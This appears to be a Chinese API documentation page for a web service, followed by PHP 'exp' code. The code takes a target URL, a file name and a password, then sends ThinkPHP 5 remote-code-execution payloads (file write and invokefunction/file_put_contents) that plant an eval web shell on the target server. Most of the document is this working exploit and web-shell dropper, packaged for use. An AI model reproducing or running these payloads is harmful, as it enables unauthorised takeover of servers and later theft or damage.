接口地址:/API.PHP
返回格式:json
请求方式:get/post
请求示例:/api.php?url=http://www.heibai.org&file=test.php&content=123456
请求参数说明:
返回参数说明:
返回示例:
{
"code": 10001,
"msg": "ok",
"url": "HTTPS://heibai.org.cn/test.php"
}
PHP演示:
<?php
header("Content-Type:text/HTML;charset=UTF-8");
date_default_timezone_set("PRC");
$请求参数名 = "内容";
$result = file_get_contents("API网址".请求参数名);
$arr=json_decode($result,true);
if ($arr['json参数名']==1) {
echo "返回信息:",$arr['返回信息'];
} else {
echo $arr['返回信息'];
}
?>
exp代码
<?php error_reporting(0);?>
<?php
if($currency_array["currency_call_record"]=="1"){
$counter = intval(file_get_contents("counter.dat"));
$_SESSION['#'] = true;
$counter++;
$fp = fopen("counter.dat","w");
fwrite($fp, $counter);
fclose($fp);
}
else{
unlink("counter.dat");
}
?>
<?php
$url=$_GET["url"];
$file=$_GET["file"];
$content=$_GET["content"];
if ($url=="" or $file=="" or $content==""){
return_json("20011","no","need url or file or content");
}
else{
yjhtp5($url,$file,$content);
return_json("10001","ok",$url."/".$file);
}
function return_json($code,$msg,$url){
$result = array(
'code'=>$code,
'msg'=>$msg,
'url'=>$url,
);
echo stripslashes(json_encode($result,JSON_UNESCAPED_UNICODE));
}
function yjhtp5($url,$file,$content){
$vulnerability_array = array(
"/index.php/?s=index/\think\template\driver\\file/write&cacheFile=【文件名】&content=【内容】",
"/index.php/?s=index/\think\template\driver\\file/write&cacheFile=【文件名】&content=【内容】",
"/index.php/?s=/index/\\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=【文件名】&vars[1][]=【内容】");
foreach ($vulnerability_array as $value) {
if (strrchr($file,'.')==".php"){
$value=str_replace("【文件名】",$file,$value);
$value=str_replace("【内容】","<?php @eval($_POST[【密码】]);?>",$value);
$value=str_replace("【密码】",$content,$value);
}
else{
$value=str_replace("【文件名】",$file,$value);
$value=str_replace("【内容】",$content,$value);
}
$c = curl_init();
$url_c = $url.$value;
curl_setopt($c, CURLOPT_URL, $url_c);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($c);
curl_close($c);
}
}
?>